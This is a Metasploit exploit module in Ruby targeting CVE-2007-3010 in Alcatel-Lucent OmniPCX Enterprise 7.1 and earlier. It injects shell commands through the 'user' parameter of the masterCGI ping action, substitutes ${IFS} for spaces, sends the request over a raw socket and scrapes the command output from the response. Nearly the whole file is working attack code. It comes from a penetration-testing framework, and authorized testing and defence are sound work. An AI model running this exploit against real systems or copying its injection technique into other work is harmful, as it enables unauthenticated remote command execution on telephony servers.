##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
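class MetasploitModule < Msf::Exploit::Remote
  Rank = ManualRanking # Only interactive single commands supported

  include Msf::Exploit::Remote::Tcp

  # Matches the <h5> element the masterCGI response wraps command output in.
  # The original pattern was written with /smi: in Ruby, /s is the Windows-31J
  # *encoding* modifier (Perl's dot-all is /m in Ruby), so the regexp carried a
  # fixed encoding and a match against a binary response containing non-ASCII
  # bytes could raise Encoding::CompatibilityError. /m alone gives the intended
  # dot-matches-newline behaviour.
  OUTPUT_REGEX = %r{<h5>(.*)</h5>}mi

  # Tags stripped from the captured output before it is printed.
  H5_TAG_REGEX = %r{<h5>|</h5>}

  # Module metadata and options. Everything below is descriptive data consumed
  # by the framework; no network activity happens here.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Alcatel-Lucent OmniPCX Enterprise masterCGI Arbitrary Command Execution',
        'Description' => %q{
          This module abuses a metacharacter injection vulnerability in the
          HTTP management interface of the Alcatel-Lucent OmniPCX Enterprise
          Communication Server 7.1 and earlier. The Unified Maintenance Tool
          contains a 'masterCGI' binary which allows an unauthenticated attacker
          to execute arbitrary commands by specifying shell metacharaters as the
          'user' within the 'ping' action to obtain 'httpd' user access. This
          module only supports command line payloads, as the httpd process kills
          the reverse/bind shell spawn after the HTTP 200 OK response.
        },
        'Author' => [ 'aushack' ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'OSVDB', '40521' ],
          [ 'BID', '25694' ],
          [ 'CVE', '2007-3010' ],
          [ 'URL', 'http://www1.alcatel-lucent.com/psirt/statements/2007002/OXEUMT.htm' ],
        ],
        'Platform' => ['unix'],
        'Arch' => ARCH_CMD,
        'Privileged' => false,
        'Payload' => {
          'Space' => 1024,
          'DisableNops' => true,
          'Compat' =>
            {
              'PayloadType' => 'cmd',
              'RequiredCmd' => 'generic'
            }
        },
        'Targets' => [
          [ 'Automatic Target', {}]
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2007-09-09',
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        Opt::RPORT(443),
        OptBool.new('SSL', [true, 'Use SSL', true]),
      ]
    )
  end

  # Sends a single GET request carrying the command payload and prints any
  # command output found in the response. Returns nil in every path; the
  # handler is only started when no output was recognised in the reply.
  def exploit
    connect

    # A literal space would terminate the HTTP request line, so spaces in the
    # encoded payload are swapped for the ${IFS} expansion (as in the original).
    cmd = payload.encoded.gsub(' ', '${IFS}')

    # Request line, Host header, then the blank line ending the headers.
    req = [
      "GET /cgi-bin/masterCGI?ping=nomip&user=;#{cmd}; HTTP/1.1",
      "Host: #{rhost}",
      '',
      ''
    ].join("\r\n")

    print_status('Sending GET request with command line payload...')
    sock.put(req)

    # Read whatever arrives within 5 seconds; the result may be nil, which the
    # safe navigation below tolerates (the original's `nil =~ re` did too).
    res = sock.get_once(-1, 5)

    # Output came back in the page body: print it and stop. The handler is
    # deliberately not started on this path, preserving the original control
    # flow (command-line payloads only, see the module description).
    if (match = res&.match(OUTPUT_REGEX))
      print_line(match[1].gsub(H5_TAG_REGEX, ''))
      return
    end

    handler
    disconnect
  end
end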